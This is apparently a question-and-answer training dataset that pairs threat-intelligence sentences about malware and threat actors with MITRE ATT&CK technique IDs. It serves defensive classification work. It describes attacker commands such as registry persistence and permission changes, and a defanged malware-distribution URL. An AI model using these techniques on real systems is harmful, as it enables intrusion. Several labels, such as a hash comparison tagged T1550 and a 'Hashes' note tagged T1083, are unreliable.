MITRE ATT&CK framework.,SUNBURST C2 data attempted to appear as benign XML related to .NET assemblies or as a faux JSON blob.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can enumerate services on compromised hosts.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHOPSTICK can switch to a new C2 channel if the current one is broken.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs has used cmd.exe for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor has opened the registry and performed query searches.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The times of day that APT33 threat actors were active suggests that they were operating in a time zone close to 04:30 hours ahead of Coordinated Universal Time (UTC)### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may target the systems of those known to conduct vulnerability research .### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OnionDuke has the capability to use a Denial of Service module.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reaver continues to collect various information from the victim machine, including the following: Computer name Volume serial number Microsoft Windows version CPU speed ANSI code page OEM code page identifier for the operating system Physical and virtual memory information Reaver encrypts this data using an incremental XOR key and uploads it to the configured remote server on the port specified### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER may use WMI when collecting information about a victim.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon modifies several registry keys for persistence and UAC bypass.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One of Dtrack can hide in replicas of legitimate programs like OllyDbg, 7-Zip, and FileZilla.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Derusbi malware supports timestomping.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar gathers information on local groups and members on the victim’s machine.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee adds collected files to a temp.zip file saved in the %temp% folder, then base64 encodes it and uploads it to control server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY can gather system information such as computer names.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker can delete shadow volumes.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BACKSPACE is capable of deleting Registry keys, sub-keys, and values on a victim system.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Waterbear can inject decrypted shellcode into the LanmanServer service.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NavRAT uses systeminfo on a victim’s machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN10 has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence attempts to get users to launch malicious attachments delivered via spearphishing emails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony has used batch scripts to delete itself after execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak can use the Registry for code updates and to collect credentials.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silent Librarian has searched victim's websites to identify the interests and academic areas of targeted individuals and to scrape source code, branding, and organizational contact information for phishing pages.### Assistant: T1594: Search Victim-Owned Websites" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre has the ability to identify installed programs on a compromised host.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may gain access to an email account for the person listed as the owner of the domain.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can collect the time on the compromised host.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has placed malware on file shares and given it the same name as legitimate documents on the share.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The signature validation process is handled via the WinVerifyTrust application programming interface function, which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PROMETHIUM has created new services and modified existing services for persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has encrypted domain-controlled systems using BitPaymer.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,*Command_Create&Inject:  This command creates a new process (using a supplied filename as the process name) and then injects malicious code into it### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MobileOrder has a command to upload information about all running processes to its C2 server.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Misdat network traffic communicates over a raw socket.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kessel can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits is prematurely terminated by itself or a second, non kernel-mode process.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DCOM can be used as a method of remotely interacting with Windows Management Instrumentation.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.### Assistant: T1538: Cloud Service Dashboard" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail can invoke Apple APIs contentsOfDirectoryAtPath, pathExtension, and compare.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may also reduce the likelihood of being collected for analysis.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has run net use to connect to network shares.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may exploit software vulnerabilities in an attempt to collect credentials.### Assistant: T1212: Exploitation for Credential Access" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dok installs two LaunchAgents to redirect all network traffic with a randomly generated name for each plist file maintaining the format com.random.name.plist.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has used Wake-on-Lan to power on turned off systems for lateral movement.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A code comparison of hash 12c786c490366727cf7279fc141921d8 with hash 6de6a0df263ecd2d71a92597b2362f2c (from November 28, 2017).  Conclusion We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey (and possibly other countries)### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor can modify the GPO to evade detection.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing has attempted to brute force hosts over SSH.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EKANS looks for processes from a hard-coded list.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI had a feature to steal data from the clipboard.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stolen Pencil victims are prompted to install malicious Google Chrome extensions which gave the threat actor the ability to read data from any website accessed.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has resized and added data to the certificate table to enable the signing of modified files with legitimate signatures.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZLib mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack has used VBA macros in Microsoft Word attachments to drop additional files to the host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has collected valid email addresses that were subsequently used in spearphishing campaigns.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The tool would connect to the SQL SharePoint database and issue a query to dump all data from the database to a temporary file affixed with 'spdata'### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OLDBAIT installs itself in %ALLUSERPROFILE%\\Application Data\Microsoft\MediaPlayer\updatewindws.exe; the directory name is missing a space and the file name is missing the letter ""o.""### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has leased servers from resellers instead of leasing infrastructure directly from hosting companies to enable its operations.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Backdoor.Pirpi also collects information about the target’s local network, including the domain controller and workstations### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used legitimate websites for C2 through dead drop resolvers , including GitHub, Pastebin, and Microsoft TechNet.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can use ImprovedReflectiveDLLInjection to deploy components.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may forge web cookies that can be used to gain access to web applications or Internet services.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These documents contained malicious OLE objects used to drop binaries.This time, however, they contained malicious OLE (Object Link Embedded) objects.Initial analysis confirmed two similarly sized OLE object files within this document which appeared to be the same from an execution point of view.The two dropped binaries were stored and executed in this location during our analysis:C:\Users\ADMINI~1\AppData\Local\Temp\Hwp (2).exeC:\Users\ADMINI~1\AppData\Local\Temp\Hwp (3).exeInitial analysis showed some sloppy cleaning up from Group123, which we used later to determine that separate campaigns were the work of this same actor, as compilation artifacts remained within the binaries:e:\Happy\Work\Source\version 12\T+M\Result\DocPrint.pdbThe second stage of the dropped binaries was used to execute wscript.exe while injecting shellcode into this process### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has been observed to query the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language and the value InstallLanguage.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher creates a new Windows service with the malicious executable for persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about processes can also be extracted from the output of Native API calls such as CreateToolhelp32Snapshot.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BBSRAT uses Expand to decompress a CAB file into executable content.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,admin@338 has attempted to get victims to launch malicious Microsoft Word attachments delivered via spearphishing emails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has used an unsigned, crafted DLL module named hha.dll that was designed to look like a legitimate 32-bit Windows DLL.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used a UEFI rootkit known as LoJax.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy issues the command reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” to achieve persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Bisonal samples encrypt C2 communications with RC4.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The structure of each of these outbound DNS requests is as follows: ---. The payload will look for different responses to these outbound queries depending on the type of DNS request that the payload uses to communicate with the C2### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A dropper used by Putter Panda installs itself into the ASEP Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run with a value named McUpdate.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET then downloads a script and Mach-O file into the Xcode project folder.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and HTRAN.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception has used a reconnaissance module to identify active processes and other associated loaded modules.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 obtained information about the configured Exchange virtual directory using Get-WebServicesVirtualDirectory.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can modify property list files to execute their code as part of establishing persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The following SSPs can be used to access credentials: * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unknown Logger is capable of recording keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilBunny has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While we can only speculate on the specific reason, it is likely Sofacy packed only the Delphi variants in an attempt to increase evasion as the Delphi variant of Zebrocy is known and has been widely analyzed### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Traps 4.0 can be configured to protect the processes that are cited as being abused in this blog from loading malicious code### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crutch has automatically exfiltrated stolen files to Dropbox.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo includes payloads written in JavaScript.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once it is encrypted using the XOR algorithm, the buffer is encoded with BASE64### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used fsutil, fsinfo drives systeminfo, and vssadmin list shadows for sytesm information including shadow volumes and drive information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, malware developed that will communicate with Twitter for C2, may require use of Web Services.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used the ActiveXObject utility to create OLE objects to obtain execution through Internet Explorer.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has gathered information about the infected computer.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used Dropbox, Amazon S3, and Google Drive to host malicious downloads.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search within public scan databases for information about victims that can be used during targeting.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LiteDuke has the ability to decrypt and decode multiple layers of obfuscation.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common subcommands include: launchctl load,launchctl unload, and launchctl start.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dridex can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLACKCOFFEE has also obfuscated its C2 traffic as normal traffic to sites such as Github.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Instead of using systeminfo and tasklist commands, the C# variant of Zebrocy uses WMI queries to gather this information### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Evilnum has sent spearphishing emails containing a link to a zip file hosted on Google Drive.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Specific examples include use of network layer protocols, such as the Internet Control Message Protocol , transport layer protocols, such as the User Datagram Protocol , session layer protocols, such as Socket Secure , as well as redirected/tunneled protocols, such as Serial over LAN .### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST had a command to delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,sudo### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Trojan will then use the following regular expression to check the HTTP response to the content upload request for the file identifier value: \”id\”:(.*) The Trojan will use this file identifier value to monitor for changes made to the file by the actor by checking for changes to the modification time of the .txt file### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XAgentOSX contains the execFile function to execute a specified file on the system using the NSTask:launch method.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SeaDuke is capable of persisting via a .lnk file stored in the Startup directory.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hashes For a list of all hashes of malware encountered during this campaign, please refer to the following file### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe uses HTTP for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities .### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has hosted malicious downloads on Github.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike has the ability to use Smart Applet attacks to disable the Java SecurityManager sandbox.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify Group Policy Objects to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike includes a capability to modify the Beacon payload to eliminate known signatures or unpacking methods.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT has used AutoIt to compile the payload and main script into a single executable after delivery.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework., VBScript ### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The generation of web cookies often requires secret values, such as passwords, Private Keys, or other cryptographic seed values.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has sent spearphishing emails with malicious RAR and .LNK attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hidden Content The primary command and control location used in this campaign is hosted on a blog on blogspot[.]com, which enables the threat actors to hide their malicious content behind a legitimate service### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VNC is a platform-independent desktop sharing system that uses the RFB protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used the icacls command to modify access control to backup servers, providing them with full control of all the system folders.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has used PowerShell to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Next, the script triggered a PowerShell stager### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use several methods to accomplish Virtualization/Sandbox Evasion such as checking for security monitoring tools or other system artifacts associated with analysis or virtualization.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Windows, there are a variety of features in scripting languages in Windows, such as PowerShell, Jscript, and Visual Basic to make windows hidden.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BISCUIT uses SSL for encrypting C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT34 has used net.exe in a script with net accounts /domain to find the password policy of a domain.### Assistant: T1201: Password Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has leveraged the Windows API, including using CreateProcess or ShellExecute, to perform a variety of tasks.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, on that same url, http://mdzz2019.noip[.]cn:3654/ is used to distribute more versions of this Gh0stRAT sample, along with a .zip file containing ASPXSpy, a web shell### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used tcping.exe, similar to Ping, to probe port status on systems of interest.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has delivered initial payloads hidden using archives and encoding measures.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has uploaded backdoored Docker images to Docker Hub.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sakula has the capability to download files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Load – Create a shared section of memory and load the malicious executable.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook has used the ShellExecuteW function call.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bad Rabbit enumerates open SMB shares on internal victim networks.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can create hidden system directories.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,who -a and w can be used to show which users are currently logged in, similar to ""net session"".### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Duqu command and control protocol's data stream can be encrypted with AES-CBC.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture , language, and/or time zone.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum can establish persistence by creating a .lnk shortcut to itself in the Startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FruitFly looks for specific files and file types.### Assistant: T1083: File and Directory 